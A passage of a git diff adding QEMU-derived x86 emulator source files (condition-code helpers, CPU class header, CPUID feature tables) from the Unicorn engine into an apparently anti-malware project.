compute_c_sbbl(dst, src1, src2); + + case CC_OP_SHLB: + return compute_c_shlb(dst, src1); + case CC_OP_SHLW: + return compute_c_shlw(dst, src1); + case CC_OP_SHLL: + return compute_c_shll(dst, src1); + + case CC_OP_BMILGB: + return compute_c_bmilgb(dst, src1); + case CC_OP_BMILGW: + return compute_c_bmilgw(dst, src1); + case CC_OP_BMILGL: + return compute_c_bmilgl(dst, src1); + +#ifdef TARGET_X86_64 + case CC_OP_ADDQ: + return compute_c_addq(dst, src1); + case CC_OP_ADCQ: + return compute_c_adcq(dst, src1, src2); + case CC_OP_SUBQ: + return compute_c_subq(dst, src1); + case CC_OP_SBBQ: + return compute_c_sbbq(dst, src1, src2); + case CC_OP_SHLQ: + return compute_c_shlq(dst, src1); + case CC_OP_BMILGQ: + return compute_c_bmilgq(dst, src1); +#endif + } +} + +void helper_write_eflags(CPUX86State *env, target_ulong t0, + uint32_t update_mask) +{ + cpu_load_eflags(env, (int)t0, update_mask); +} + +target_ulong helper_read_eflags(CPUX86State *env) +{ + return cpu_compute_eflags(env); +} + +void helper_clts(CPUX86State *env) +{ + env->cr[0] &= ~CR0_TS_MASK; + env->hflags &= ~HF_TS_MASK; +} + +void helper_reset_rf(CPUX86State *env) +{ + env->eflags &= ~RF_MASK; +} + +void helper_cli(CPUX86State *env) +{ + env->eflags &= ~IF_MASK; +} + +void helper_sti(CPUX86State *env) +{ + env->eflags |= IF_MASK; +} + +void helper_clac(CPUX86State *env) +{ + env->eflags &= ~AC_MASK; +} + +void helper_stac(CPUX86State *env) +{ + env->eflags |= AC_MASK; +} + +#if 0 +/* vm86plus instructions */ +void helper_cli_vm(CPUX86State *env) +{ + env->eflags &= ~VIF_MASK; +} + +void helper_sti_vm(CPUX86State *env) +{ + env->eflags |= VIF_MASK; + if (env->eflags & VIP_MASK) { + raise_exception(env, EXCP0D_GPF); + } +} +#endif + +void helper_set_inhibit_irq(CPUX86State *env) +{ + env->hflags |= HF_INHIBIT_IRQ_MASK; +} + +void helper_reset_inhibit_irq(CPUX86State *env) +{ + env->hflags &= ~HF_INHIBIT_IRQ_MASK; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper_template.h new file mode 100644 index 0000000..dc34d0d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper_template.h @@ -0,0 +1,242 @@ +/* + * x86 condition code helpers + * + * Copyright (c) 2008 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#define DATA_BITS (1 << (3 + SHIFT)) + +#if DATA_BITS == 8 +#define SUFFIX b +#define DATA_TYPE uint8_t +#elif DATA_BITS == 16 +#define SUFFIX w +#define DATA_TYPE uint16_t +#elif DATA_BITS == 32 +#define SUFFIX l +#define DATA_TYPE uint32_t +#elif DATA_BITS == 64 +#define SUFFIX q +#define DATA_TYPE uint64_t +#else +#error unhandled operand size +#endif + +#define SIGN_MASK (((DATA_TYPE)1) << (DATA_BITS - 1)) + +/* dynamic flags computation */ + +static int glue(compute_all_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2 = dst - src1; + + cf = dst < src1; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + return dst < src1; +} + +static int glue(compute_all_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, + DATA_TYPE src3) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2 = dst - src1 - src3; + + cf = (src3 ? dst <= src1 : dst < src1); + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & 0x10; + zf = (dst == 0) << 6; + sf = lshift(dst, 8 - DATA_BITS) & 0x80; + of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, + DATA_TYPE src3) +{ + return src3 ? dst <= src1 : dst < src1; +} + +static int glue(compute_all_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src1 = dst + src2; + + cf = src1 < src2; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) +{ + DATA_TYPE src1 = dst + src2; + + return src1 < src2; +} + +static int glue(compute_all_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, + DATA_TYPE src3) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src1 = dst + src2 + src3; + + cf = (src3 ? src1 <= src2 : src1 < src2); + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & 0x10; + zf = (dst == 0) << 6; + sf = lshift(dst, 8 - DATA_BITS) & 0x80; + of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, + DATA_TYPE src3) +{ + DATA_TYPE src1 = dst + src2 + src3; + + return (src3 ? src1 <= src2 : src1 < src2); +} + +static int glue(compute_all_logic, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = 0; + pf = parity_table[(uint8_t)dst]; + af = 0; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = 0; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_inc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2; + + cf = (int)src1; + src1 = dst - 1; + src2 = 1; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = (dst == SIGN_MASK) * CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_dec, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2; + + cf = (int)src1; + src1 = dst + 1; + src2 = 1; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = (dst == SIGN_MASK - 1) * CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = (src1 >> (DATA_BITS - 1)) & CC_C; + pf = parity_table[(uint8_t)dst]; + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + /* of is defined iff shift count == 1 */ + of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + return (src1 >> (DATA_BITS - 1)) & CC_C; +} + +static int glue(compute_all_sar, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = src1 & 1; + pf = parity_table[(uint8_t)dst]; + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + /* of is defined iff shift count == 1 */ + of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +/* NOTE: we compute the flags like the P4. On olders CPUs, only OF and + CF are modified and it is slower to do that. Note as well that we + don't truncate SRC1 for computing carry to DATA_TYPE. */ +static int glue(compute_all_mul, SUFFIX)(DATA_TYPE dst, target_long src1) +{ + int cf, pf, af, zf, sf, of; + + cf = (src1 != 0); + pf = parity_table[(uint8_t)dst]; + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = cf * CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = (src1 == 0); + pf = 0; /* undefined */ + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = 0; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + return src1 == 0; +} + +#undef DATA_BITS +#undef SIGN_MASK +#undef DATA_TYPE +#undef DATA_MASK +#undef SUFFIX diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu-qom.h new file mode 100644 index 0000000..5d19fc4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu-qom.h @@ -0,0 +1,157 @@ +/* + * QEMU x86 CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_I386_CPU_QOM_H +#define QEMU_I386_CPU_QOM_H + +#include "qom/cpu.h" +#include "cpu.h" +#include "qapi/error.h" + +#ifdef TARGET_X86_64 +#define TYPE_X86_CPU "x86_64-cpu" +#else +#define TYPE_X86_CPU "i386-cpu" +#endif + +#define X86_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, X86CPUClass, (klass), TYPE_X86_CPU) +#define X86_CPU(uc, obj) ((X86CPU *)obj) +#define X86_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, X86CPUClass, (obj), TYPE_X86_CPU) + +/** + * X86CPUDefinition: + * + * CPU model definition data that was not converted to QOM per-subclass + * property defaults yet. + */ +typedef struct X86CPUDefinition X86CPUDefinition; + +/** + * X86CPUClass: + * @cpu_def: CPU model definition + * @kvm_required: Whether CPU model requires KVM to be enabled. + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * An x86 CPU model or family. + */ +typedef struct X86CPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + /* Should be eventually replaced by subclass-specific property defaults. */ + X86CPUDefinition *cpu_def; + + bool kvm_required; + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} X86CPUClass; + +/** + * X86CPU: + * @env: #CPUX86State + * @migratable: If set, only migratable flags will be accepted when "enforce" + * mode is used, and only migratable flags will be included in the "host" + * CPU model. + * + * An x86 CPU. + */ +typedef struct X86CPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUX86State env; + + bool hyperv_vapic; + bool hyperv_relaxed_timing; + int hyperv_spinlock_attempts; + bool hyperv_time; + bool check_cpuid; + bool enforce_cpuid; + bool expose_kvm; + bool migratable; + bool host_features; + + /* if true the CPUID code directly forward host cache leaves to the guest */ + bool cache_info_passthrough; + + /* Features that were filtered out because of missing host capabilities */ + uint32_t filtered_features[FEATURE_WORDS]; + + /* Enable PMU CPUID bits. This can't be enabled by default yet because + * it doesn't have ABI stability guarantees, as it passes all PMU CPUID + * bits returned by GET_SUPPORTED_CPUID (that depend on host CPU and kernel + * capabilities) directly to the guest. + */ + bool enable_pmu; + + /* in order to simplify APIC support, we leave this pointer to the + user */ + struct DeviceState *apic_state; +} X86CPU; + +static inline X86CPU *x86_env_get_cpu(CPUX86State *env) +{ + return container_of(env, X86CPU, env); +} + +#define ENV_GET_CPU(e) CPU(x86_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(X86CPU, env) + +#ifndef CONFIG_USER_ONLY +extern struct VMStateDescription vmstate_x86_cpu; +#endif + +/** + * x86_cpu_do_interrupt: + * @cpu: vCPU the interrupt is to be handled by. + */ +void x86_cpu_do_interrupt(CPUState *cpu); +bool x86_cpu_exec_interrupt(CPUState *cpu, int int_req); + +int x86_cpu_write_elf64_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); +int x86_cpu_write_elf32_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); +int x86_cpu_write_elf64_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); +int x86_cpu_write_elf32_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); + +void x86_cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list, + Error **errp); + +void x86_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags); + +hwaddr x86_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); + +int x86_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int x86_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +void x86_cpu_exec_enter(CPUState *cpu); +void x86_cpu_exec_exit(CPUState *cpu); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.c new file mode 100644 index 0000000..7f574a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.c @@ -0,0 +1,2633 @@ +/* + * i386 CPUID helper functions + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "sysemu/cpus.h" +#include "topology.h" + +#include "qapi/qmp/qerror.h" + +#include "qapi-types.h" +#include "qapi-visit.h" +#include "qapi/visitor.h" + +#include "hw/hw.h" + +#include "sysemu/sysemu.h" +#include "hw/cpu/icc_bus.h" +#ifndef CONFIG_USER_ONLY +#include "hw/i386/apic_internal.h" +#endif + +/* Cache topology CPUID constants: */ + +/* CPUID Leaf 2 Descriptors */ + +#define CPUID_2_L1D_32KB_8WAY_64B 0x2c +#define CPUID_2_L1I_32KB_8WAY_64B 0x30 +#define CPUID_2_L2_2MB_8WAY_64B 0x7d + + +/* CPUID Leaf 4 constants: */ + +/* EAX: */ +#define CPUID_4_TYPE_DCACHE 1 +#define CPUID_4_TYPE_ICACHE 2 +#define CPUID_4_TYPE_UNIFIED 3 + +#define CPUID_4_LEVEL(l) ((l) << 5) + +#define CPUID_4_SELF_INIT_LEVEL (1 << 8) +#define CPUID_4_FULLY_ASSOC (1 << 9) + +/* EDX: */ +#define CPUID_4_NO_INVD_SHARING (1 << 0) +#define CPUID_4_INCLUSIVE (1 << 1) +#define CPUID_4_COMPLEX_IDX (1 << 2) + +#define ASSOC_FULL 0xFF + +/* AMD associativity encoding used on CPUID Leaf 0x80000006: */ +#define AMD_ENC_ASSOC(a) (a <= 1 ? a : \ + a == 2 ? 0x2 : \ + a == 4 ? 0x4 : \ + a == 8 ? 0x6 : \ + a == 16 ? 0x8 : \ + a == 32 ? 0xA : \ + a == 48 ? 0xB : \ + a == 64 ? 0xC : \ + a == 96 ? 0xD : \ + a == 128 ? 0xE : \ + a == ASSOC_FULL ? 0xF : \ + 0 /* invalid value */) + + +/* Definitions of the hardcoded cache entries we expose: */ + +/* L1 data cache: */ +#define L1D_LINE_SIZE 64 +#define L1D_ASSOCIATIVITY 8 +#define L1D_SETS 64 +#define L1D_PARTITIONS 1 +/* Size = LINE_SIZE*ASSOCIATIVITY*SETS*PARTITIONS = 32KiB */ +#define L1D_DESCRIPTOR CPUID_2_L1D_32KB_8WAY_64B +/*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ +#define L1D_LINES_PER_TAG 1 +#define L1D_SIZE_KB_AMD 64 +#define L1D_ASSOCIATIVITY_AMD 2 + +/* L1 instruction cache: */ +#define L1I_LINE_SIZE 64 +#define L1I_ASSOCIATIVITY 8 +#define L1I_SETS 64 +#define L1I_PARTITIONS 1 +/* Size = LINE_SIZE*ASSOCIATIVITY*SETS*PARTITIONS = 32KiB */ +#define L1I_DESCRIPTOR CPUID_2_L1I_32KB_8WAY_64B +/*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ +#define L1I_LINES_PER_TAG 1 +#define L1I_SIZE_KB_AMD 64 +#define L1I_ASSOCIATIVITY_AMD 2 + +/* Level 2 unified cache: */ +#define L2_LINE_SIZE 64 +#define L2_ASSOCIATIVITY 16 +#define L2_SETS 4096 +#define L2_PARTITIONS 1 +/* Size = LINE_SIZE*ASSOCIATIVITY*SETS*PARTITIONS = 4MiB */ +/*FIXME: CPUID leaf 2 descriptor is inconsistent with CPUID leaf 4 */ +#define L2_DESCRIPTOR CPUID_2_L2_2MB_8WAY_64B +/*FIXME: CPUID leaf 0x80000006 is inconsistent with leaves 2 & 4 */ +#define L2_LINES_PER_TAG 1 +#define L2_SIZE_KB_AMD 512 + +/* No L3 cache: */ +#define L3_SIZE_KB 0 /* disabled */ +#define L3_ASSOCIATIVITY 0 /* disabled */ +#define L3_LINES_PER_TAG 0 /* disabled */ +#define L3_LINE_SIZE 0 /* disabled */ + +/* TLB definitions: */ + +#define L1_DTLB_2M_ASSOC 1 +#define L1_DTLB_2M_ENTRIES 255 +#define L1_DTLB_4K_ASSOC 1 +#define L1_DTLB_4K_ENTRIES 255 + +#define L1_ITLB_2M_ASSOC 1 +#define L1_ITLB_2M_ENTRIES 255 +#define L1_ITLB_4K_ASSOC 1 +#define L1_ITLB_4K_ENTRIES 255 + +#define L2_DTLB_2M_ASSOC 0 /* disabled */ +#define L2_DTLB_2M_ENTRIES 0 /* disabled */ +#define L2_DTLB_4K_ASSOC 4 +#define L2_DTLB_4K_ENTRIES 512 + +#define L2_ITLB_2M_ASSOC 0 /* disabled */ +#define L2_ITLB_2M_ENTRIES 0 /* disabled */ +#define L2_ITLB_4K_ASSOC 4 +#define L2_ITLB_4K_ENTRIES 512 + +void x86_cpu_register_types(void *); + +static void x86_cpu_vendor_words2str(char *dst, uint32_t vendor1, + uint32_t vendor2, uint32_t vendor3) +{ + int i; + for (i = 0; i < 4; i++) { + dst[i] = vendor1 >> (8 * i); + dst[i + 4] = vendor2 >> (8 * i); + dst[i + 8] = vendor3 >> (8 * i); + } + dst[CPUID_VENDOR_SZ] = '\0'; +} + +/* feature flags taken from "Intel Processor Identification and the CPUID + * Instruction" and AMD's "CPUID Specification". In cases of disagreement + * between feature naming conventions, aliases may be added. + */ +static const char *feature_name[] = { + "fpu", "vme", "de", "pse", + "tsc", "msr", "pae", "mce", + "cx8", "apic", NULL, "sep", + "mtrr", "pge", "mca", "cmov", + "pat", "pse36", "pn" /* Intel psn */, "clflush" /* Intel clfsh */, + NULL, "ds" /* Intel dts */, "acpi", "mmx", + "fxsr", "sse", "sse2", "ss", + "ht" /* Intel htt */, "tm", "ia64", "pbe", +}; +static const char *ext_feature_name[] = { + "pni|sse3" /* Intel,AMD sse3 */, "pclmulqdq|pclmuldq", "dtes64", "monitor", + "ds_cpl", "vmx", "smx", "est", + "tm2", "ssse3", "cid", NULL, + "fma", "cx16", "xtpr", "pdcm", + NULL, "pcid", "dca", "sse4.1|sse4_1", + "sse4.2|sse4_2", "x2apic", "movbe", "popcnt", + "tsc-deadline", "aes", "xsave", "osxsave", + "avx", "f16c", "rdrand", "hypervisor", +}; +/* Feature names that are already defined on feature_name[] but are set on + * CPUID[8000_0001].EDX on AMD CPUs don't have their names on + * ext2_feature_name[]. They are copied automatically to cpuid_ext2_features + * if and only if CPU vendor is AMD. + */ +static const char *ext2_feature_name[] = { + NULL /* fpu */, NULL /* vme */, NULL /* de */, NULL /* pse */, + NULL /* tsc */, NULL /* msr */, NULL /* pae */, NULL /* mce */, + NULL /* cx8 */ /* AMD CMPXCHG8B */, NULL /* apic */, NULL, "syscall", + NULL /* mtrr */, NULL /* pge */, NULL /* mca */, NULL /* cmov */, + NULL /* pat */, NULL /* pse36 */, NULL, NULL /* Linux mp */, + "nx|xd", NULL, "mmxext", NULL /* mmx */, + NULL /* fxsr */, "fxsr_opt|ffxsr", "pdpe1gb" /* AMD Page1GB */, "rdtscp", + NULL, "lm|i64", "3dnowext", "3dnow", +}; +static const char *ext3_feature_name[] = { + "lahf_lm" /* AMD LahfSahf */, "cmp_legacy", "svm", "extapic" /* AMD ExtApicSpace */, + "cr8legacy" /* AMD AltMovCr8 */, "abm", "sse4a", "misalignsse", + "3dnowprefetch", "osvw", "ibs", "xop", + "skinit", "wdt", NULL, "lwp", + "fma4", "tce", NULL, "nodeid_msr", + NULL, "tbm", "topoext", "perfctr_core", + "perfctr_nb", NULL, NULL, NULL, + NULL, NULL, NULL, NULL, +}; + +static const char *ext4_feature_name[] = { + NULL, NULL, "xstore", "xstore-en", + NULL, NULL, "xcrypt", "xcrypt-en", + "ace2", "ace2-en", "phe", "phe-en", + "pmm", "pmm-en", NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, +}; + +static const char *cpuid_7_0_ebx_feature_name[] = { + "fsgsbase", "tsc_adjust", NULL, "bmi1", "hle", "avx2", NULL, "smep", + "bmi2", "erms", "invpcid", "rtm", NULL, NULL, "mpx", NULL, + "avx512f", NULL, "rdseed", "adx", "smap", NULL, NULL, NULL, + NULL, NULL, "avx512pf", "avx512er", "avx512cd", NULL, NULL, NULL, +}; + +static const char *cpuid_apm_edx_feature_name[] = { + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + "invtsc", NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, +}; + +#define I486_FEATURES (CPUID_FP87 | CPUID_VME | CPUID_PSE) +#define PENTIUM_FEATURES (I486_FEATURES | CPUID_DE | CPUID_TSC | \ + CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_MMX | CPUID_APIC) +#define PENTIUM2_FEATURES (PENTIUM_FEATURES | CPUID_PAE | CPUID_SEP | \ + CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ + CPUID_PSE36 | CPUID_FXSR) +#define PENTIUM3_FEATURES (PENTIUM2_FEATURES | CPUID_SSE) +#define PPRO_FEATURES (CPUID_FP87 | CPUID_DE | CPUID_PSE | CPUID_TSC | \ + CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_PGE | CPUID_CMOV | \ + CPUID_PAT | CPUID_FXSR | CPUID_MMX | CPUID_SSE | CPUID_SSE2 | \ + CPUID_PAE | CPUID_SEP | CPUID_APIC) + +#define TCG_FEATURES (CPUID_FP87 | CPUID_PSE | CPUID_TSC | CPUID_MSR | \ + CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | \ + CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ + CPUID_PSE36 | CPUID_CLFLUSH | CPUID_ACPI | CPUID_MMX | \ + CPUID_FXSR | CPUID_SSE | CPUID_SSE2 | CPUID_SS) + /* partly implemented: + CPUID_MTRR, CPUID_MCA, CPUID_CLFLUSH (needed for Win64) */ + /* missing: + CPUID_VME, CPUID_DTS, CPUID_SS, CPUID_HT, CPUID_TM, CPUID_PBE */ +#define TCG_EXT_FEATURES (CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | \ + CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | \ + CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_POPCNT | \ + CPUID_EXT_MOVBE | CPUID_EXT_AES | CPUID_EXT_HYPERVISOR) + /* missing: + CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_VMX, CPUID_EXT_SMX, + CPUID_EXT_EST, CPUID_EXT_TM2, CPUID_EXT_CID, CPUID_EXT_FMA, + CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_PCID, CPUID_EXT_DCA, + CPUID_EXT_X2APIC, CPUID_EXT_TSC_DEADLINE_TIMER, CPUID_EXT_XSAVE, + CPUID_EXT_OSXSAVE, CPUID_EXT_AVX, CPUID_EXT_F16C, + CPUID_EXT_RDRAND */ + +#ifdef TARGET_X86_64 +#define TCG_EXT2_X86_64_FEATURES (CPUID_EXT2_SYSCALL | CPUID_EXT2_LM) +#else +#define TCG_EXT2_X86_64_FEATURES 0 +#endif + +#define TCG_EXT2_FEATURES ((TCG_FEATURES & CPUID_EXT2_AMD_ALIASES) | \ + CPUID_EXT2_NX | CPUID_EXT2_MMXEXT | CPUID_EXT2_RDTSCP | \ + CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_PDPE1GB | \ + TCG_EXT2_X86_64_FEATURES) +#define TCG_EXT3_FEATURES (CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | \ + CPUID_EXT3_CR8LEG | CPUID_EXT3_ABM | CPUID_EXT3_SSE4A) +#define TCG_EXT4_FEATURES 0 +#define TCG_SVM_FEATURES 0 +#define TCG_KVM_FEATURES 0 +#define TCG_7_0_EBX_FEATURES (CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_SMAP | \ + CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ADX) + /* missing: + CPUID_7_0_EBX_FSGSBASE, CPUID_7_0_EBX_HLE, CPUID_7_0_EBX_AVX2, + CPUID_7_0_EBX_ERMS, CPUID_7_0_EBX_INVPCID, CPUID_7_0_EBX_RTM, + CPUID_7_0_EBX_RDSEED */ +#define TCG_APM_FEATURES 0 + + +typedef struct FeatureWordInfo { + const char **feat_names; + uint32_t cpuid_eax; /* Input EAX for CPUID */ + bool cpuid_needs_ecx; /* CPUID instruction uses ECX as input */ + uint32_t cpuid_ecx; /* Input ECX value for CPUID */ + int cpuid_reg; /* output register (R_* constant) */ + uint32_t tcg_features; /* Feature flags supported by TCG */ + uint32_t unmigratable_flags; /* Feature flags known to be unmigratable */ +} FeatureWordInfo; + +static FeatureWordInfo feature_word_info[FEATURE_WORDS] = { +#ifdef _MSC_VER + // FEAT_1_EDX + { + feature_name, + 1, + false,0, + R_EDX, + TCG_FEATURES, + }, + // FEAT_1_ECX + { + ext_feature_name, + 1, + false,0, + R_ECX, + TCG_EXT_FEATURES, + }, + // FEAT_7_0_EBX + { + cpuid_7_0_ebx_feature_name, + 7, + true, 0, + R_EBX, + TCG_7_0_EBX_FEATURES, + }, + // FEAT_8000_0001_EDX + { + ext2_feature_name, + 0x80000001, + false,0, + R_EDX, + TCG_EXT2_FEATURES, + }, + // FEAT_8000_0001_ECX + { + ext3_feature_name, + 0x80000001, + false,0, + R_ECX, + TCG_EXT3_FEATURES, + }, + // FEAT_8000_0007_EDX + { + cpuid_apm_edx_feature_name, + 0x80000007, + false,0, + R_EDX, + TCG_APM_FEATURES, + CPUID_APM_INVTSC, + }, + // FEAT_C000_0001_EDX + { + ext4_feature_name, + 0xC0000001, + false,0, + R_EDX, + TCG_EXT4_FEATURES, + }, + // FEAT_KVM + {0}, + // FEAT_SVM + {0}, +#else + [FEAT_1_EDX] = { + .feat_names = feature_name, + .cpuid_eax = 1, .cpuid_reg = R_EDX, + .tcg_features = TCG_FEATURES, + }, + [FEAT_1_ECX] = { + .feat_names = ext_feature_name, + .cpuid_eax = 1, .cpuid_reg = R_ECX, + .tcg_features = TCG_EXT_FEATURES, + }, + [FEAT_8000_0001_EDX] = { + .feat_names = ext2_feature_name, + .cpuid_eax = 0x80000001, .cpuid_reg = R_EDX, + .tcg_features = TCG_EXT2_FEATURES, + }, + [FEAT_8000_0001_ECX] = { + .feat_names = ext3_feature_name, + .cpuid_eax = 0x80000001, .cpuid_reg = R_ECX, + .tcg_features = TCG_EXT3_FEATURES, + }, + 